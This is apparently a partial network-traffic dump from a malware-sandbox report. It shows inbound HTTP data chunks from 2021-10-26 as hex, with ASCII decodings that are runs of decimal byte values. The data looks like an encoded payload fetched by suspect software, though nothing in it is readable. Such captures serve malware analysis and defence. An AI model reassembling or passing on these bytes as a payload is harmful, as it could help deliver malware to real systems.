                    2021-10-26 16:59:17 UTC33INData Raw: 37 20 31 35 32 20 34 39 20 34 38 20 35 30 20 38 39 20 32 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 31 31 36 20 34 38 20 35 30 20 35 30 20 35 39 20 36 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 31 37 36 20 31 31 37 20 35 34 20 38 34 20 31 31 38 20 37 37 20 35 36 20 31 34 33 20 32 30 35 20 32 30 37 20 31 37 38 20 31 35 20 38 34 20 31 31 34 20 31 31 33 20 38 35 20 33 39 20 32 30 35 20 32 30 37 20 32 30 35 20 31 38 32 20 31 31 30 20 31 31 34 20 31 31 37 20 31 30 35 20 37 32 20 31 30 37 20 32 30 37 20 32 30 35 20 32 30 31 20 38 34 20 31 31 33 20 36 39 20 31 31 30 20 31 31 32 20 32 30 38 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 34 20 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 30 35 20 38 34 20 31 38 39
                    Data Ascii: 7 152 49 48 50 89 24 114 117 107 14 116 48 50 50 59 61 117 109 118 24 176 117 54 84 118 77 56 143 205 207 178 15 84 114 113 85 39 205 207 205 182 110 114 117 105 72 107 207 205 201 84 113 69 110 112 208 48 50 54 84 114 117 109 14 9 48 50 50 116 205 84 189
                    2021-10-26 16:59:17 UTC34INData Raw: 20 32 34 31 20 31 30 39 20 31 31 32 20 35 30 20 32 39 20 35 30 20 35 34 20 36 39 20 31 20 31 38 33 20 31 30 39 20 31 31 32 20 35 36 20 33 39 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 34 20 32 33 37 20 39 33 20 35 30 20 34 38 20 35 34 20 32 39 20 38 34 20 31 32 20 31 31 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 32 34 31 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 31 31 20 31 37 34 20 38 31 20 37 38 20 37 36 20 35 34 20 38 34 20 31 31 38 20 38 35 20 32 33 36 20 38 32 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 31 38 30 20 35 30 20 34 38 20 35 36 20 34 30 20 31 32 31 20 31 32 32 20 38 33 20 31 32 33 20 31 31 30 20 33 31 20 35 34 20 32 30 20 32 39 20 37 34 20 31 32 37 20 39 34 20 31 35 35 20 31 32 34 20 32
                    Data Ascii: 241 109 112 50 29 50 54 69 1 183 109 112 56 39 31 53 114 89 114 237 93 50 48 54 29 84 12 11 109 112 54 24 241 54 84 120 88 111 174 81 78 76 54 84 118 85 236 82 226 46 26 201 84 114 115 69 180 50 48 56 40 121 122 83 123 110 31 54 20 29 74 127 94 155 124 2
                    2021-10-26 16:59:17 UTC35INData Raw: 20 31 31 34 20 31 31 37 20 31 30 37 20 31 30 33 20 32 34 20 33 35 20 35 35 20 31 34 20 31 32 35 20 31 34 31 20 31 33 38 20 31 34 36 20 39 39 20 35 34 20 38 20 32 20 32 30 31 20 31 37 31 20 31 34 31 20 39 39 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 32 35 20 31 30 39 20 31 31 32 20 35 30 20 33 31 20 35 30 20 35 34 20 36 39 20 31 30 30 20 31 31 39 20 32 32 37 20 31 39 39 20 33 37 20 31 30 35 20 34 30 20 32 37 20 38 33 20 38 34 20 31 30 35 20 36 34 20 31 31 38 20 32 30 20 32 37 20 31 30 31 20 35 39 20 31 32 37 20 31 33 33 20 31 32 37 20 37 30 20 31 33 36 20 34 38 20 35 34 20 31 36 38 20 36 36 20 32 35 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 36 20 33 31 20 34 33 20 32 30 20 35 32 20 38 32 20 31 30 31 20 34 35 20 32
                    Data Ascii: 114 117 107 103 24 35 55 14 125 141 138 146 99 54 8 2 201 171 141 99 71 112 50 48 33 6 80 114 25 109 112 50 31 50 54 69 100 119 227 199 37 105 40 27 83 84 105 64 118 20 27 101 59 127 133 127 70 136 48 54 168 66 255 114 117 108 106 31 43 20 52 82 101 45 2
                    2021-10-26 16:59:17 UTC37INData Raw: 20 31 32 34 20 31 39 20 31 38 39 20 35 30 20 34 38 20 35 36 20 33 30 20 31 35 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 35 33 20 32 37 20 34 39 20 35 39 20 31 32 37 20 31 35 36 20 39 37 20 37 31 20 31 34 20 32 35 35 20 34 38 20 35 30 20 36 30 20 39 33 20 39 30 20 31 36 34 20 31 30 39 20 31 31 32 20 35 32 20 33 37 20 33 31 20 33 38 20 31 31 34 20 31 31 37 20 31 31 20 31 36 30 20 31 31 32 20 35 30 20 35 38 20 32 36 20 32 34 38 20 38 34 20 31 31 34 20 31 32 37 20 36 35 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31 38 36 20 31 30 32 20 39 35 20 31 39 20 31 38 39 20 35 30 20 34 38 20 35 36 20 36 33 20 31 32 34 20 31 36 30 20 31 31 37 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 35 38 20 31 36 20 36 39 20 31 31 39 20 39 39 20 39 34 20 31 32 30
                    Data Ascii: 124 19 189 50 48 56 30 154 114 117 103 92 53 27 49 59 127 156 97 71 14 255 48 50 60 93 90 164 109 112 52 37 31 38 114 117 11 160 112 50 58 26 248 84 114 127 65 119 25 51 57 29 186 102 95 19 189 50 48 56 63 124 160 117 109 118 43 29 58 16 69 119 99 94 120
                    2021-10-26 16:59:17 UTC38INData Raw: 34 20 31 31 37 20 31 30 35 20 39 32 20 33 34 20 35 34 20 31 38 20 31 30 37 20 31 31 38 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 32 32 34 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 38 33 20 34 38 20 35 30 20 36 30 20 31 33 38 20 31 31 34 20 39 35 20 31 30 39 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 31 20 31 31 37 20 38 39 20 33 33 20 35 30 20 32 31 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 38 34 20 35 30 20 35 34 20 38 34 20 37 31 20 31 31 37 20 31 30 39 20 39 37 20 33 36 20 32 34 20 31 31 36 20 35 35 20 38 34 20 31 31 36 20 31 30 39 20 36 34 20 31 31 39 20 32 30 20 34 33 20 33 31 20 34 38 20 31 31 34 20 38 39 20 36 33 20 39 37 20 39 31 20
                    Data Ascii: 4 117 105 92 34 54 18 107 118 162 107 69 143 50 48 52 30 224 114 117 107 88 83 48 50 60 138 114 95 109 113 34 48 50 54 84 111 117 89 33 50 21 116 54 84 115 102 93 116 50 84 50 54 84 71 117 109 97 36 24 116 55 84 116 109 64 119 20 43 31 48 114 89 63 97 91
                    2021-10-26 16:59:17 UTC39INData Raw: 38 34 20 31 31 34 20 37 35 20 36 39 20 37 37 20 35 31 20 34 38 20 35 32 20 32 37 20 38 35 20 38 38 20 39 38 20 36 39 20 32 34 36 20 35 30 20 34 38 20 35 32 20 32 38 20 37 31 20 36 36 20 31 31 33 20 31 30 39 20 39 35 20 35 31 20 34 38 20 35 30 20 31 20 38 34 20 31 31 34 20 31 30 30 20 36 39 20 37 33 20 35 31 20 34 38 20 35 32 20 31 35 20 31 31 32 20 31 31 35 20 31 31 37 20 31 30 39 20 31 34 20 37 38 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 35 20 39 35 20 31 39 20 31 31 20 35 30 20 34 38 20 35 34 20 32 37 20 38 33 20 31 32 20 36 38 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 35 35 20 37 32 20 31 30 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 36 20 33 31 20 36 31 20 32 30 20 37 32 20 34 37 20 31 31 34 20 31 31 37 20 31 30 35 20 37 33 20 31 35 33
                    Data Ascii: 84 114 75 69 77 51 48 52 27 85 88 98 69 246 50 48 52 28 71 66 113 109 95 51 48 50 1 84 114 100 69 73 51 48 52 15 112 115 117 109 14 78 48 50 50 121 115 95 19 11 50 48 54 27 83 12 68 109 112 54 27 55 72 100 114 117 105 106 31 61 20 72 47 114 117 105 73 153
                    2021-10-26 16:59:17 UTC41INData Raw: 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 35 20 33 31 20 35 30 20 32 30 20 32 38 20 31 31 34 20 38 39 20 31 33 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 32 30 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 32 36 20 38 20 38 35 20 31 31 34 20 31 31 35 20 36 35 20 31 30 36 20 33 38 20 32 30 36 20 35 32 20 32 34 36 20 38 34 20 31 31 34 20 31 31 35 20 33 30 20 31 35 34 20 35 30 20 34 38 20 35 36 20 33 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 30 20 33 31 20 35 31 20 32 30 20 32 39 20 38 37 20 38 34 20 39 34 20 31 30 39 20 39 30 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 35 35 20 31 30 39 20 31 31 32 20 35 30 20 38 20 35 30 20 35 34 20 36 39 20 31 32 20 31 35 33 20 31
                    Data Ascii: 0 191 114 117 103 105 31 50 20 28 114 89 137 109 115 2 57 50 20 84 114 117 109 112 50 48 26 8 85 114 115 65 106 38 206 52 246 84 114 115 30 154 50 48 56 30 191 114 117 103 110 31 51 20 29 87 84 94 109 90 50 48 33 6 80 114 55 109 112 50 8 50 54 69 12 153 1
                    2021-10-26 16:59:17 UTC42INData Raw: 20 35 31 20 31 31 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 36 20 33 31 20 35 34 20 32 30 20 32 39 20 38 32 20 31 32 31 20 39 34 20 31 33 38 20 31 32 34 20 32 35 20 34 38 20 35 38 20 33 30 20 32 35 30 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 34 36 20 35 36 20 32 36 20 31 35 33 20 38 34 20 31 31 34 20 31 32 37 20 31 31 39 20 39 33 20 33 34 20 32 32 20 35 39 20 33 32 20 31 32 34 20 31 33 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 32 30 30 20 35 30 20 35 34 20 39 34 20 31 32 31 20 31 37 31 20 39 30 20 31 32 35 20 32 35 20 32 32 32 20 35 38 20 33 36 20 38 35 20 39 30 20 31 34 30 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 32 30 30 20 35 34 20 38
                    Data Ascii: 51 119 162 107 69 143 50 48 52 30 252 114 117 103 106 31 54 20 29 82 121 94 138 124 25 48 58 30 250 114 117 103 92 46 56 26 153 84 114 127 119 93 34 22 59 32 124 133 117 109 122 26 200 50 54 94 121 171 90 125 25 222 58 36 85 90 140 109 112 56 24 200 54 8
                    2021-10-26 16:59:17 UTC43INData Raw: 20 35 30 20 36 30 20 31 32 34 20 31 36 37 20 31 31 37 20 31 30 39 20 31 31 38 20 34 30 20 32 39 20 35 35 20 31 36 20 31 32 36 20 38 34 20 39 34 20 31 33 37 20 38 36 20 32 35 20 32 30 31 20 35 30 20 35 34 20 38 34 20 39 37 20 36 39 20 31 31 30 20 31 31 32 20 31 35 31 20 34 38 20 35 30 20 35 34 20 31 30 37 20 31 31 34 20 31 31 37 20 31 32 34 20 33 20 39 31 20 34 39 20 35 30 20 34 38 20 37 36 20 39 35 20 35 37 20 37 35 20 31 31 38 20 32 36 20 31 31 39 20 35 31 20 35 34 20 38 32 20 32 39 20 32 34 33 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 32 36 20 31 32 36 20 38 35 20 31 31 34 20 31 31 35 20 32 20 32 34 38 20 35 31 20 34 38 20 35 32 20 34 38 20 31 32 34 20 35 39 20 31 31 36 20 31 30 39 20 31 31 38 20 39 33 20 37 38 20 35 31 20 35 34 20 38 32 20 31 31 36
                    Data Ascii: 50 60 124 167 117 109 118 40 29 55 16 126 84 94 137 86 25 201 50 54 84 97 69 110 112 151 48 50 54 107 114 117 124 3 91 49 50 48 76 95 57 75 118 26 119 51 54 82 29 243 108 112 52 54 26 126 85 114 115 2 248 51 48 52 48 124 59 116 109 118 93 78 51 54 82 116
                    2021-10-26 16:59:17 UTC45INData Raw: 39 37 20 34 38 20 34 20 33 32 20 31 32 34 20 32 34 34 20 31 31 37 20 31 30 39 20 31 31 38 20 33 36 20 32 34 20 35 34 20 35 35 20 38 34 20 31 32 30 20 39 35 20 31 30 39 20 31 31 32 20 31 31 32 20 32 34 20 31 31 32 20 35 35 20 38 34 20 31 31 36 20 39 33 20 31 37 39 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 38 38 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 37 33 20 31 30 39 20 31 31 32 20 35 30 20 36 32 20 35 30 20 35 34 20 36 39 20 39 30 20 32 33 34 20 31 30 39 20 31 31 32 20 35 32 20 33 39 20 33 31 20 37 20 31 31 34 20 38 32 20 31 30 31 20 37 33 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 31 31 35 20 36 39 20 37 30 20 35 31 20 34 38 20 35 32 20 31 38 36 20
                    Data Ascii: 97 48 4 32 124 244 117 109 118 36 24 54 55 84 120 95 109 112 112 24 112 55 84 116 93 179 112 50 58 26 188 84 114 115 71 112 50 48 33 6 80 114 73 109 112 50 62 50 54 69 90 234 109 112 52 39 31 7 114 82 101 73 160 44 24 205 54 84 116 115 69 70 51 48 52 186
                    2021-10-26 16:59:17 UTC46INData Raw: 34 33 20 35 30 20 34 38 20 35 32 20 35 32 20 31 32 34 20 34 36 20 31 31 37 20 31 30 39 20 31 32 32 20 34 37 20 32 39 20 32 35 20 31 36 20 31 31 36 20 31 36 36 20 38 30 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 31 31 37 20 39 33 20 32 35 33 20 31 31 32 20 35 30 20 35 34 20 34 31 20 32 37 20 37 38 20 38 34 20 31 32 35 20 36 39 20 31 34 38 20 35 30 20 34 38 20 35 36 20 34 37 20 31 32 31 20 39 37 20 38 33 20 31 32 34 20 31 31 36 20 34 39 20 39 35 20 35 38 20 35 35 20 38 34 20 31 32 30 20 38 39 20 31 32 32 20 39 31 20 35 36 20 35 39 20 32 35 20 32 32 39 20 38 38 20 38 39 20 31 34 35 20 31 32 36 20 31 31 36 20 32 35 20 32 31 38 20 33 35 20 35 30 20 35 39 20 31 32 33 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 32 30 36 20 35
                    Data Ascii: 43 50 48 52 52 124 46 117 109 122 47 29 25 16 116 166 80 189 110 26 207 50 54 82 117 93 253 112 50 54 41 27 78 84 125 69 148 50 48 56 47 121 97 83 124 116 49 95 58 55 84 120 89 122 91 56 59 25 229 88 89 145 126 116 25 218 35 50 59 123 116 109 122 36 206 5
                    2021-10-26 16:59:17 UTC47INData Raw: 39 20 31 32 32 20 36 33 20 35 37 20 32 36 20 38 37 20 38 35 20 31 31 34 20 31 31 35 20 39 37 20 31 32 31 20 39 33 20 37 33 20 35 30 20 35 34 20 39 34 20 31 31 37 20 31 32 35 20 31 32 33 20 38 38 20 37 36 20 34 38 20 35 30 20 36 30 20 36 36 20 31 34 30 20 31 31 36 20 31 30 33 20 31 37 34 20 30 20 36 31 20 32 35 20 32 35 33 20 39 35 20 38 39 20 31 36 37 20 37 32 20 38 38 20 31 32 36 20 34 38 20 35 30 20 36 30 20 37 31 20 31 31 38 20 31 30 30 20 31 30 35 20 38 30 20 31 31 32 20 32 31 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 32 20 35 30 20 35 34 20 38 32 20 39 30 20 32 30 20 31 30 39 20 31 31 32 20 35 36 20 32 33 38 20 35 36 20 36 33 20 31 32 30 20 31 31 36 20 31 32 34 20 32 20 39 20 35 30 20 34 38 20
                    Data Ascii: 9 122 63 57 26 87 85 114 115 97 121 93 73 50 54 94 117 125 123 88 76 48 50 60 66 140 116 103 174 0 61 25 253 95 89 167 72 88 126 48 50 60 71 118 100 105 80 112 21 226 40 124 141 117 109 118 26 132 50 54 82 90 20 109 112 56 238 56 63 120 116 124 2 9 50 48
                    2021-10-26 16:59:17 UTC49INData Raw: 20 35 31 20 34 38 20 35 36 20 32 33 32 20 31 31 32 20 38 37 20 39 33 20 33 33 20 31 31 32 20 35 30 20 35 38 20 34 30 20 32 37 20 37 36 20 38 34 20 31 32 35 20 37 37 20 39 37 20 32 33 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 35 31 20 36 32 20 32 39 20 31 37 38 20 38 38 20 38 31 20 31 30 38 20 31 30 38 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 36 35 20 38 39 20 31 31 32 20 32 32 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 37 20 35 33 20 31 31 32 20 34 34 20 37 30 20 35 30 20 31 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 32 20 35 32 20 35 30 20 31 39
                    Data Ascii: 51 48 56 232 112 87 93 33 112 50 58 40 27 76 84 125 77 97 23 224 44 30 171 114 117 107 88 134 48 50 48 124 19 117 109 122 236 51 62 29 178 88 81 108 108 50 48 50 54 84 114 65 89 112 22 118 50 54 85 114 117 53 112 44 70 50 18 18 114 117 108 107 2 52 50 19
                    2021-10-26 16:59:17 UTC50INData Raw: 31 30 38 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 36 35 20 38 39 20 31 31 32 20 32 32 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 37 20 35 33 20 31 31 32 20 34 34 20 37 30 20 35 30 20 31 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 32 20 35 32 20 35 30 20 39 32 20 38 34 20 31 31 34 20 31 31 37 20 34 32 20 31 31 32 20 35 30 20 33 33 20 37 36 20 32 31 38 20 38 34 20 31 31 34 20 31 32 37 20 31 39 20 39 35 20 35 30 20 34 38 20 35 34 20 33 32 20 35 39 20 31 35 39 20 31 31 37 20 31 30 39 20 31 32 32 20 34 36 20 32 39 20 33 30 20 31 36 20 38 33 20 31 32 20 31 30 20 31 30 39 20 31 31 32 20 35 34 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 33 31 20 31 31 32 20 35 30 20 35 38 20 32 36 20 33 35
                    Data Ascii: 108 50 48 50 54 84 114 65 89 112 22 118 50 54 85 114 117 53 112 44 70 50 18 18 114 117 108 107 2 52 50 92 84 114 117 42 112 50 33 76 218 84 114 127 19 95 50 48 54 32 59 159 117 109 122 46 29 30 16 83 12 10 109 112 54 78 77 54 84 120 26 131 112 50 58 26 35
                    2021-10-26 16:59:17 UTC52INData Raw: 20 31 31 32 20 35 32 20 32 34 20 34 32 20 35 35 20 38 34 20 31 32 30 20 38 35 20 31 33 32 20 38 36 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 31 35 20 35 30 20 34 38 20 35 36 20 38 39 20 31 38 38 20 31 31 34 20 31 31 37 20 31 30 33 20 33 31 20 34 33 20 34 39 20 35 30 20 36 30 20 36 37 20 39 35 20 38 39 20 37 35 20 31 34 20 37 36 20 34 38 20 35 30 20 35 30 20 38 33 20 38 32 20 32 32 38 20 37 35 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 39 33 20 31 33 32 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 35 38 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 33 35 20 32 32 20 35 32 20 33 30 20 32 35 30 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 36 33 20 32 37 20 35 39 20 35
                    Data Ascii: 112 52 24 42 55 84 120 85 132 86 226 46 26 201 84 114 115 19 15 50 48 56 89 188 114 117 103 31 43 49 50 60 67 95 89 75 14 76 48 50 50 83 82 228 75 160 44 24 205 54 84 116 93 132 112 50 58 26 158 84 114 127 117 93 35 22 52 30 250 114 117 103 92 63 27 59 5
                    2021-10-26 16:59:17 UTC53INData Raw: 34 20 31 30 30 20 31 30 39 20 36 34 20 39 35 20 32 30 20 37 38 20 31 32 30 20 35 34 20 38 34 20 31 31 38 20 32 36 20 31 31 39 20 31 31 33 20 35 30 20 35 38 20 32 36 20 32 20 38 35 20 31 31 34 20 31 31 35 20 36 39 20 32 33 38 20 35 30 20 34 38 20 35 32 20 33 30 20 39 37 20 31 31 35 20 31 31 37 20 31 30 37 20 38 38 20 31 37 32 20 34 38 20 35 30 20 34 38 20 34 32 20 36 39 20 31 31 37 20 31 30 39 20 31 31 36 20 33 30 20 33 37 20 32 35 20 35 36 20 32 31 32 20 35 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 35 33 20 31 37 38 20 31 32 32 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 38 37 20 32 36 20 31 34 36 20 35 30 20 35 34 20 38 32 20 31 30 30 20 31 31 20 33 39 20 31 31 32 20 35 30 20 35 32 20 39 33 20 34 35 20 38 35 20 31 31 34 20 31 32 37 20 31
                    Data Ascii: 4 100 109 64 95 20 78 120 54 84 118 26 119 113 50 58 26 2 85 114 115 69 238 50 48 52 30 97 115 117 107 88 172 48 50 48 42 69 117 109 116 30 37 25 56 212 57 117 109 116 25 253 178 122 84 114 113 70 187 26 146 50 54 82 100 11 39 112 50 52 93 45 85 114 127 1
                    2021-10-26 16:59:17 UTC54INData Raw: 33 38 20 34 38 20 31 32 36 20 31 32 30 20 39 38 20 36 34 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 32 20 38 34 20 31 30 32 20 31 31 37 20 31 31 37 20 39 32 20 35 30 20 35 35 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 30 20 39 33 20 31 31 36 20 35 30 20 31 38 33 20 35 30 20 35 34 20 38 34 20 36 33 20 31 31 37 20 31 30 39 20 39 37 20 37 36 20 31 30 20 35 30 20 35 34 20 38 30 20 39 35 20 31 31 36 20 37 31 20 31 34 20 38 20 34 38 20 35 30 20 35 30 20 35 39 20 34 34 20 31 31 37 20 31 30 39 20 31 32 32 20 34 37 20 32 39 20 34 39 20 31 36 20 31 32 37 20 33 39 20 31 32 31 20 37 30 20 31 33 39 20 33 32 20 35 30 20 32 36 20 31 30 35 20 38 34 20 31 31 34 20 31 32 37 20 31 31 39 20 39 33 20 35 37 20 32 32 20 35 32 20 37 37 20 36 35 20 31 31 34 20 31 31 37 20
                    Data Ascii: 38 48 126 120 98 64 113 34 48 50 52 84 102 117 117 92 50 55 50 54 84 114 110 93 116 50 183 50 54 84 63 117 109 97 76 10 50 54 80 95 116 71 14 8 48 50 50 59 44 117 109 122 47 29 49 16 127 39 121 70 139 32 50 26 105 84 114 127 119 93 57 22 52 77 65 114 117
                    2021-10-26 16:59:17 UTC58INData Raw: 38 30 20 39 34 20 39 36 20 31 32 33 20 32 34 30 20 31 31 38 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 31 30 20 38 32 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 31 39 32 20 31 30 39 20 31 31 32 20 35 32 20 37 38 20 31 31 20 35 34 20 38 34 20 31 31 38 20 38 39 20 39 20 31 34 20 31 31 20 34 38 20 35 30 20 35 30 20 35 39 20 39 30 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 33 30 20 31 37 20 32 32 20 31 39 20 38 35 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 34 32 20 37 35 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 32 34 20 35 31 20 35 34 20 39 34 20 32 35 34 20 35 37 20 31 30 39 20 31 31 32 20 35 31 20 32 34 20 31 31 30 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 36 20 31
                    Data Ascii: 80 94 96 123 240 118 48 50 50 116 210 82 189 110 26 207 50 54 82 90 192 109 112 52 78 11 54 84 118 89 9 14 11 48 50 50 59 90 116 109 122 36 30 17 22 19 85 165 115 88 205 48 50 48 42 75 117 109 116 93 24 51 54 94 254 57 109 112 51 24 110 54 84 120 93 216 1
                    2021-10-26 16:59:17 UTC62INData Raw: 20 35 32 20 35 31 20 34 37 20 34 30 20 31 32 31 20 38 35 20 38 33 20 32 20 36 32 20 35 30 20 34 38 20 35 36 20 35 33 20 35 39 20 39 33 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 31 35 37 20 35 30 20 35 34 20 39 34 20 39 30 20 31 39 32 20 31 30 39 20 31 31 32 20 35 32 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 36 20 31 31 32 20 35 30 20 35 34 20 32 34 20 31 36 20 31 32 37 20 32 30 32 20 38 33 20 37 30 20 31 37 36 20 32 30 20 32 37 20 32 32 39 20 35 33 20 31 30 30 20 31 31 39 20 31 31 37 20 31 35 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 20 31 38 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 33 31 20 38 34 20 31 31 34 20 31 31 35 20 37 37 20 32 30 33 20 32 36 20 32 32 34 20 34 34 20 33 30 20 31
                    Data Ascii: 52 51 47 40 121 85 83 2 62 50 48 56 53 59 93 116 109 122 26 157 50 54 94 90 192 109 112 52 78 77 54 84 120 93 216 112 50 54 24 16 127 202 83 70 176 20 27 229 53 100 119 117 15 112 50 48 50 54 84 114 11 18 112 50 58 26 131 84 114 115 77 203 26 224 44 30 1
                    2021-10-26 16:59:17 UTC63INData Raw: 34 20 39 34 20 39 30 20 38 36 20 31 30 38 20 31 31 32 20 35 36 20 35 39 20 33 32 20 35 35 20 31 32 34 20 36 35 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 36 20 35 31 20 35 34 20 39 34 20 39 30 20 36 34 20 31 30 38 20 31 31 32 20 35 36 20 31 36 20 31 30 37 20 33 30 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 32 36 20 32 31 20 38 35 20 31 31 34 20 31 32 37 20 32 32 35 20 36 36 20 35 30 20 34 38 20 35 31 20 33 30 20 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 32 32 20 37 36 20 31 31 33 20 35 30 20 35 34 20 38 30 20 39 34 20 39 39 20 31 39 20 37 39 20 35 30 20 34 38 20 35 34 20 34 38 20 35 39 20 36 39 20 31 31 36 20 31 30 39 20 31 32 32 20 37 36 20 31 35 20 35 30 20 35 34 20 38 30 20 31 31 32 20 32 36 20 38 39 20 31 31
                    Data Ascii: 4 94 90 86 108 112 56 59 32 55 124 65 116 109 122 26 6 51 54 94 90 64 108 112 56 16 107 30 132 108 93 146 112 50 54 26 21 85 114 127 225 66 50 48 51 30 8 114 117 103 122 76 113 50 54 80 94 99 19 79 50 48 54 48 59 69 116 109 122 76 15 50 54 80 112 26 89 11
                    2021-10-26 16:59:17 UTC68INData Raw: 38 38 20 38 33 20 34 38 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 31 20 35 30 20 31 33 34 20 32 34 39 20 35 34 20 32 33 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 34 39 20 35 34 20 31 39 36 20 31 31 34 20 31 31 37 20 31 30 39 20 34 33 20 35 30 20 34 38 20 33 35 20 33 30 20 31 31 39 20 31 31 35 20 31 31 37 20 31 30 33 20 31 31 30 20 33 31 20 35 38 20 32 30 20 37 32 20 39 36 20 31 31 34 20 31 31 37 20 31 30 35 20 39 32 20 35 36 20 32 37 20 34 39 20 36 30 20 31 32 37 20 31 33 34 20 39 33 20 32 31 35 20 31 31 32 20 35 30 20 35 34 20 37 36 20 31 31 37 20 38 34 20 31 31 34 20 31 31 33 20 38 34 20 32 37 20 35 30 20 34 38 20 35 30 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 38 38 20 34 39
                    Data Ascii: 88 83 48 51 38 84 114 117 109 101 50 134 249 54 23 52 117 109 113 33 0 49 54 196 114 117 109 43 50 48 35 30 119 115 117 103 110 31 58 20 72 96 114 117 105 92 56 27 49 60 127 134 93 215 112 50 54 76 117 84 114 113 84 27 50 48 50 72 23 114 117 105 31 188 49
